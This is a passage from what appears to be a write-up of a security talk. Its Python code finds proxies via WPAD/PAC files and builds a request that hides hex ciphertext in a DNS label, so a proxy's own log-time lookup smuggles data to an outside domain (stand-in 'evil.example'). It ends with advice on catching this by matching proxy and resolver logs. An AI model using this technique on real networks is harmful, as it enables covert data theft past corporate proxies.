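            found.append(entry)
    return found


def exfil_request(ciphertext, domain):
    """The request the talk types into a telnet session with the proxy. The hex ciphertext is
    one DNS label, so the proxy's own log-time lookup carries it to the authoritative
    server for the domain (CARPA), even though the proxy answers the client with a 403."""
    label = ciphertext.hex()
    if len(label) > 63:
        raise ValueError("a DNS label is at most 63 characters, i.e. 31 ciphertext bytes")
    host = f"{label}.{domain}"
    return f"GET http://{host}/ HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


# Constructed PAC file of the shape a corporate WPAD server returns
SAMPLE_PAC = """function FindProxyForURL(url, host) {
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example")) return "DIRECT";
    if (shExpMatch(url, "https:*")) return "HTTPS proxy.corp.example:8443; DIRECT";
    return "PROXY proxy.corp.example:8080; PROXY 10.1.2.3:3128; DIRECT";
}
"""

if __name__ == "__main__":
    print(len(candidate_hostnames()), "names to try, e.g.", candidate_hostnames()[:4])
    print("PAC URLs:", pac_urls("corp.example"))
    print("proxies:", proxies_from_pac(SAMPLE_PAC))
    print(exfil_request(bytes(range(30)), "evil.example").decode(), end="")
```

On the defensive side the same parser is the check you want: the proxy's access log will show a 403 for a never-seen hostname under an external domain, and a resolver log on the proxy's DNS path will show the proxy itself asking for that name. Correlating those two entries, rather than looking at the 403 alone, is what separates this from the millions of ordinary blocked requests the talk mentions.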